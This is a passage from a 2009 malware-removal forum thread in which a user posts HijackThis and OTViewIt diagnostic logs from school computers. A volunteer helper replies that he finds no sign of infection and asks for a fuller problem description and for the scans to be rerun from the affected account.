condition - it is being logged in case it contributed to that condition. Process
ALsvc.exe, (start check timestamp [ 1c9b3b786c33fc6]).

Error - 4/2/2009 1:21:57 PM | Computer Name = 001_23_TEACHER | Source = SAVOnAccessControl | ID = 3997781
Description = File [...oUpdate\ALsvc.exe]'s scan succeeded following a timeout/busy
condition - it is being logged in case it contributed to that condition. Process
ALsvc.exe, (start check timestamp [ 1c9b3b786c8047a]).

Error - 4/2/2009 2:44:41 PM | Computer Name = 001_23_TEACHER | Source = Service Control Manager | ID = 7024
Description = The SQL Server (MSSMLBIZ) service terminated with service-specific
error 3417 (0xD59).


< End of report >

hijackthis
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 1:49:09 PM, on 4/2/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16791)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\ScanSoft\OmniPageSE2.0\OpwareSE2.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Sophos\AutoUpdate\ALMon.exe
C:\Program Files\Kodak\Kodak EasyShare software\bin\EasyShare.exe
C:\Program Files\Kodak\KODAK Software Updater\7288971\Program\Kodak Software Updater.exe
C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\SMART Technologies Inc\SMART Board Software\Aware.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\SMART Technologies Inc\SMART Board Software\Marker.exe
C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe
C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe
C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe
C:\Program Files\Sophos\AutoUpdate\ALsvc.exe
C:\Program Files\Sophos\Remote Management System\RouterNT.exe
c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Lightspeed Systems\User Agent\UAService.exe
C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\system32\wuauclt.exe
C:\HiJackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
O2 - BHO: &Yahoo! Toolbar Helper - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Sophos Web Content Scanner - {39EA7695-B3F2-4C44-A4BC-297ADA8FD235} - C:\Program Files\Sophos\Sophos Anti-Virus\SophosBHO.dll
O2 - BHO: SMART Notebook Download Plugin - {67BCF957-85FC-4036-8DC4-D4D80E00A77B} - C:\Program Files\SMART Technologies Inc\Notebook Software\NotebookPlugin.dll
O2 - BHO: Canon Easy Web Print Helper - {68F9551E-0411-48E4-9AAF-4BC42A6A46BE} - C:\Program Files\Canon\Easy-WebPrint\EWPBrowseLoader.dll
O2 - BHO: Java™ Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.1.807.1746\swg.dll
O2 - BHO: Java™ Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O2 - BHO: SingleInstance Class - {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} - C:\Program Files\Yahoo!\Companion\Installs\cpn\YTSingleInstance.dll
O3 - Toolbar: Easy-WebPrint - {327C2873-E90D-4c37-AA9D-10AC9BABA46C} - C:\Program Files\Canon\Easy-WebPrint\Toolband.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O4 - HKLM\..\Run: [igfxtray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [igfxhkcmd] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [igfxpers] C:\WINDOWS\system32\igfxpers.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [Windows Defender] "C:\Program Files\Windows Defender\MSASCui.exe" -hide
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [OpwareSE2] "C:\Program Files\ScanSoft\OmniPageSE2.0\OpwareSE2.exe"
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-18\..\Run: [DWQueuedReporting] "C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [DWQueuedReporting] "C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (User 'Default user')
O4 - Global Startup: AutoUpdate Monitor.lnk = C:\Program Files\Sophos\AutoUpdate\ALMon.exe
O4 - Global Startup: Kodak EasyShare software.lnk = C:\Program Files\Kodak\Kodak EasyShare software\bin\EasyShare.exe
O4 - Global Startup: Kodak software updater.lnk = C:\Program Files\Kodak\KODAK Software Updater\7288971\Program\Kodak Software Updater.exe
O4 - Global Startup: SMART Board Tools.lnk = C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/windowsupd...b?1207583621953
O16 - DPF: {CF40ACC5-E1BB-4AFF-AC72-04C2F616BCA7} (get_atlcom Class) - http://wwwimages.adobe.com/www.adobe.com/p...obat/nos/gp.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/flas...ent/swflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = vview.edu
O17 - HKLM\Software\..\Telephony: DomainName = vview.edu
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = vview.edu
O20 - AppInit_DLLs: C:\PROGRA~1\Sophos\SOPHOS~1\SOPHOS~1.DLL
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: dkab_device - Unknown owner - C:\WINDOWS\system32\DKabcoms.exe
O23 - Service: getPlus® Helper - NOS Microsystems Ltd. - C:\Program Files\NOS\bin\getPlus_HelperSvc.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: Kodak Camera Connection Software (KodakCCS) - Unknown owner - C:\WINDOWS\system32\drivers\KodakCCS.exe (file missing)
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\SYSTEM32\SPOOL\DRIVERS\W32X86\3\HPZipm12.exe
O23 - Service: Sophos Anti-Virus status reporter (SAVAdminService) - Sophos Plc - C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe
O23 - Service: Sophos Anti-Virus (SAVService) - Sophos Plc - C:\Program Files\Sophos\Sophos Anti-Virus\SavService.exe
O23 - Service: SMART Board Service - SMART Technologies Inc. - C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe
O23 - Service: SMART Web Server - Unknown owner - C:\Program Files\SMART Technologies Inc\SMART Board Software\WebServer.exe
O23 - Service: Sophos Agent - Sophos Plc - C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe
O23 - Service: Sophos AutoUpdate Service - Sophos Plc - C:\Program Files\Sophos\AutoUpdate\ALsvc.exe
O23 - Service: Sophos Device Control Service - Sophos Plc - C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe
O23 - Service: Sophos Message Router - Sophos Plc - C:\Program Files\Sophos\Remote Management System\RouterNT.exe
O23 - Service: User Agent Service (UAService) - Lightspeed Systems - C:\Program Files\Lightspeed Systems\User Agent\UAService.exe

--
End of file - 10498 bytes

#4 Farbar

Farbar

    Just Curious


  • Security Developer
  • 21,689 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Netherlands
  • Local time:05:36 PM

Posted 02 April 2009 - 02:05 PM

I don't see any description of the problem or any sign of infection.

#5 nightjar59

nightjar59
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:10:36 AM

Posted 02 April 2009 - 02:07 PM

I am using a different username because the Teachers User Account will not run any programs.

#6 Farbar

Farbar

    Just Curious


  • Security Developer
  • 21,689 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Netherlands
  • Local time:05:36 PM

Posted 02 April 2009 - 02:29 PM

We are not going to clean the user account you are logging in are we? In that account I see some problems such as two antiviruses and some old Java that should be uninstalled but no sign of infection.

First: I requested a full description of the problem.
Second: The instruction was to run those scanners in such a way that they run even when logged in as the infected user account.

So please log in and remove the downloaded and renamed program from the dreger's desktop.

#7 Farbar

Farbar

    Just Curious


  • Security Developer
  • 21,689 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Netherlands
  • Local time:05:36 PM

Posted 02 April 2009 - 02:55 PM

Please don't miss my previous post.

Log in to the infected account.

Please set your system to show file extensions, as I see you renamed the file to powerpnt.exe.exe it should be just powerpnt.exe:
  • Click Start, open Computer, select the Tools menu and click Folder Options.
  • Select the View Tab.
  • Uncheck: Hide file extensions for known file types
  • Click Apply and OK.
Then go on with step 2 and 3.

Edited by farbar, 02 April 2009 - 02:55 PM.


#8 nightjar59

nightjar59
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:10:36 AM

Posted 02 April 2009 - 03:03 PM

Had to get another infected machine because the teachers machine will not run any programs........

otviewit
OTViewIt logfile created on: 4/2/2009 2:57:43 PM - Run
OTViewIt by OldTimer - Version 1.0.21.0 Folder = C:\Documents and Settings\administrator.VVIEW\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 7.0.5730.13)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

1.99 Gb Total Physical Memory | 1.30 Gb Available Physical Memory | 65.48% Memory free
3.84 Gb Paging File | 3.31 Gb Available in Paging File | 86.22% Paging File free
Paging file location(s): C:\pagefile.sys 2046 4092;

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 74.50 Gb Total Space | 61.36 Gb Free Space | 82.37% Space Free | Partition Type: NTFS
Drive D: | 64.77 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: CDFS
Drive E: | 1.86 Gb Total Space | 0.15 Gb Free Space | 8.30% Space Free | Partition Type: FAT
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
I: Drive not present or media not loaded

Computer Name: 103_LIB_S3
Current User Name: Administrator
Logged in as Administrator.

Current Boot Mode: Normal
Scan Mode: All users
Whitelist: On
File Age = 60 Days

========== Processes ==========

[2006/11/03 19:19:58 | 00,013,592 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MsMpEng.exe
[2008/09/24 15:52:08 | 00,098,304 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SavService.exe
[2008/02/18 11:16:30 | 00,110,592 | ---- | M] (Apple, Inc.) -- C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
[2008/01/11 17:50:16 | 00,030,312 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
[2007/07/24 15:17:08 | 00,229,376 | ---- | M] (Apple Inc.) -- C:\Program Files\Bonjour\mDNSResponder.exe
[2009/03/09 05:19:15 | 00,152,984 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\jqs.exe
[2003/06/19 23:25:00 | 00,322,120 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
[2008/10/27 09:14:03 | 00,069,632 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe
[2007/11/02 05:48:32 | 01,283,336 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe
[2009/04/02 05:00:20 | 00,266,240 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe
[2009/01/28 07:24:29 | 00,172,032 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\AutoUpdate\ALsvc.exe
[2009/04/02 05:00:16 | 00,794,624 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\RouterNT.exe
[2008/11/24 22:31:08 | 00,239,968 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
[2008/11/24 22:31:12 | 00,087,904 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
[2008/08/07 14:48:30 | 00,192,512 | ---- | M] (Lightspeed Systems) -- C:\Program Files\Lightspeed Systems\User Agent\UAService.exe
[2009/04/02 05:00:33 | 00,393,216 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe
[2008/11/24 22:31:10 | 29,263,712 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
[2008/10/16 15:09:44 | 00,051,224 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\wuauclt.exe
[2004/10/14 14:42:54 | 01,404,928 | ---- | M] (Analog Devices, Inc.) -- C:\Program Files\Analog Devices\Core\smax4pnp.exe
[2005/10/14 14:46:34 | 00,077,824 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\hkcmd.exe
[2005/10/14 14:50:30 | 00,114,688 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\igfxpers.exe
[2008/01/11 22:16:38 | 00,039,792 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe
[2006/11/03 19:20:12 | 00,866,584 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MSASCui.exe
[2008/03/30 10:36:40 | 00,267,048 | ---- | M] (Apple Inc.) -- C:\Program Files\iTunes\iTunesHelper.exe
[2004/07/27 16:50:18 | 00,081,920 | ---- | M] (InstallShield Software Corporation) -- C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe
[2006/10/20 17:23:38 | 00,118,784 | ---- | M] (CyberLink Corp.) -- C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
[2008/05/08 06:24:44 | 00,155,648 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\wscript.exe
[2009/03/09 05:19:17 | 00,148,888 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\jusched.exe
[2009/03/05 16:07:20 | 02,260,480 | RHS- | M] (Safer-Networking Ltd.) -- C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
[2009/01/28 07:24:29 | 00,245,760 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\AutoUpdate\ALMon.exe
[2007/11/02 05:48:46 | 04,519,176 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe
[2007/11/02 05:48:34 | 02,090,248 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\Aware.exe
[2007/11/02 05:48:40 | 03,990,792 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\Marker.exe
[2008/03/30 10:36:30 | 00,504,104 | ---- | M] (Apple Inc.) -- C:\Program Files\iPod\bin\iPodService.exe
[2009/04/02 13:33:26 | 00,422,912 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\administrator.VVIEW\desktop\powerpnt.exe.exe

========== (O23) Win32 Services ==========

[2008/02/18 11:16:30 | 00,110,592 | ---- | M] (Apple, Inc.) -- C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe -- (Apple Mobile Device [Auto | Running])
[2007/10/24 01:47:22 | 00,033,800 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe -- (aspnet_state [On_Demand | Stopped])
[2008/01/11 17:50:16 | 00,030,312 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe -- (BcmSqlStartupSvc [Auto | Running])
[2007/07/24 15:17:08 | 00,229,376 | ---- | M] (Apple Inc.) -- C:\Program Files\Bonjour\mDNSResponder.exe -- (Bonjour Service [Auto | Running])
[2007/10/24 01:47:40 | 00,070,144 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32 [On_Demand | Stopped])
[2005/08/10 16:58:18 | 00,491,520 | ---- | M] () -- C:\WINDOWS\system32\DKabcoms.exe -- (dkab_device [On_Demand | Stopped])
[2007/10/09 12:58:12 | 00,036,864 | ---- | M] (Microsoft Corporation) -- c:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe -- (FontCache3.0.0.0 [On_Demand | Stopped])
[2007/10/11 09:55:10 | 00,864,256 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe -- (idsvc [Unknown | Stopped])
[2008/03/30 10:36:30 | 00,504,104 | ---- | M] (Apple Inc.) -- C:\Program Files\iPod\bin\iPodService.exe -- (iPod Service [On_Demand | Running])
[2009/03/09 05:19:15 | 00,152,984 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\jqs.exe -- (JavaQuickStarterService [Auto | Running])
[2003/06/19 23:25:00 | 00,322,120 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE -- (MDM [Auto | Running])
[2008/11/24 22:31:10 | 29,263,712 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe -- (MSSQL$MSSMLBIZ [On_Demand | Running])
[2008/11/24 22:31:08 | 00,045,408 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe -- (MSSQLServerADHelper [Disabled | Stopped])
[2007/10/11 09:55:14 | 00,122,880 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe -- (NetTcpPortSharing [Disabled | Stopped])
[2007/08/24 03:19:12 | 00,443,776 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE -- (odserv [On_Demand | Stopped])
[2006/10/26 14:03:08 | 00,145,184 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE -- (ose [On_Demand | Stopped])
[2008/10/27 09:14:03 | 00,069,632 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe -- (SAVAdminService [Unknown | Running])
[2008/09/24 15:52:08 | 00,098,304 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SavService.exe -- (SAVService [Unknown | Running])
[2007/11/02 05:48:32 | 01,283,336 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe -- (SMART Board Service [Auto | Running])
[2007/11/02 05:48:58 | 00,767,240 | ---- | M] () -- C:\Program Files\SMART Technologies Inc\SMART Board Software\WebServer.exe -- (SMART Web Server [On_Demand | Stopped])
[2009/04/02 05:00:20 | 00,266,240 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe -- (Sophos Agent [Auto | Running])
[2009/01/28 07:24:29 | 00,172,032 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\AutoUpdate\ALsvc.exe -- (Sophos AutoUpdate Service [Auto | Running])
[2009/04/02 05:00:33 | 00,393,216 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe -- (Sophos Device Control Service [Unknown | Running])
[2009/04/02 05:00:16 | 00,794,624 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\RouterNT.exe -- (Sophos Message Router [Auto | Running])
[2008/11/24 22:31:08 | 00,239,968 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe -- (SQLBrowser [Auto | Running])
[2008/11/24 22:31:12 | 00,087,904 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe -- (SQLWriter [Auto | Running])
[2008/08/07 14:48:30 | 00,192,512 | ---- | M] (Lightspeed Systems) -- C:\Program Files\Lightspeed Systems\User Agent\UAService.exe -- (UAService [Auto | Running])
[2006/11/03 19:19:58 | 00,013,592 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend [Auto | Running])
[2006/10/18 20:05:24 | 00,913,408 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Media Player\wmpnetwk.exe -- (WMPNetworkSvc [On_Demand | Stopped])

========== Driver Services ==========

[2005/03/17 16:30:10 | 00,132,608 | ---- | M] (Broadcom Corporation) -- C:\WINDOWS\system32\drivers\b57xp32.sys -- (b57w2k [On_Demand | Running])
[2004/12/13 16:14:00 | 00,039,904 | ---- | M] (Adaptec, Inc.) -- C:\WINDOWS\System32\drivers\cercsr6.sys -- (cercsr6 [Boot | Stopped])
[2008/01/29 12:01:28 | 00,016,168 | ---- | M] (GEAR Software Inc.) -- C:\WINDOWS\system32\drivers\GEARAspiWDM.sys -- (GEARAspiWDM [On_Demand | Running])
[2005/10/14 15:15:18 | 01,302,812 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\drivers\ialmnt5.sys -- (ialm [On_Demand | Running])
[2008/04/14 00:09:50 | 00,014,592 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\drivers\kbdhid.sys -- (kbdhid [System | Running])
[2007/04/02 16:02:02 | 00,072,576 | ---- | M] (Mars Semiconductor Corp.) -- C:\WINDOWS\system32\drivers\marsqx5.sys -- (marsqx5 [On_Demand | Stopped])
[2004/08/04 05:00:00 | 00,017,792 | ---- | M] (Parallel Technologies, Inc.) -- C:\WINDOWS\system32\drivers\ptilink.sys -- (Ptilink [On_Demand | Running])
[2009/02/26 06:02:37 | 00,110,848 | ---- | M] (Sophos Plc) -- C:\WINDOWS\system32\drivers\savonaccesscontrol.sys -- (SAVOnAccessControl [System | Running])
[2009/02/26 06:02:48 | 00,038,528 | ---- | M] (Sophos Plc) -- C:\WINDOWS\system32\drivers\savonaccessfilter.sys -- (SAVOnAccessFilter [System | Running])
[2007/11/13 05:25:53 | 00,020,480 | ---- | M] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.) -- C:\WINDOWS\system32\drivers\secdrv.sys -- (Secdrv [On_Demand | Stopped])
[2004/09/17 09:02:54 | 00,732,928 | ---- | M] (Creative Technology Ltd.) -- C:\WINDOWS\system32\drivers\senfilt.sys -- (senfilt [On_Demand | Running])
[2005/01/27 15:31:06 | 00,260,352 | ---- | M] (Analog Devices, Inc.) -- C:\WINDOWS\system32\drivers\smwdm.sys -- (smwdm [On_Demand | Running])
[2008/09/24 18:09:37 | 00,014,976 | ---- | M] (Sophos Plc) -- C:\WINDOWS\system32\drivers\SophosBootDriver.sys -- (SophosBootDriver [Disabled | Stopped])

========== (R ) Internet Explorer ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL"=http://www.vview.net
"Default_Search_URL"=http://go.microsoft.com/fwlink/?LinkId=54896
"Default_Secondary_Page_URL"=
"Extensions Off Page"=about:NoAdd-ons
"Local Page"=%SystemRoot%\system32\blank.htm
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Security Risk Page"=about:SecurityRisk
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search]
"CustomizeSearch"=http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchcust.htm
"SearchAssistant"=http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main]
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks]
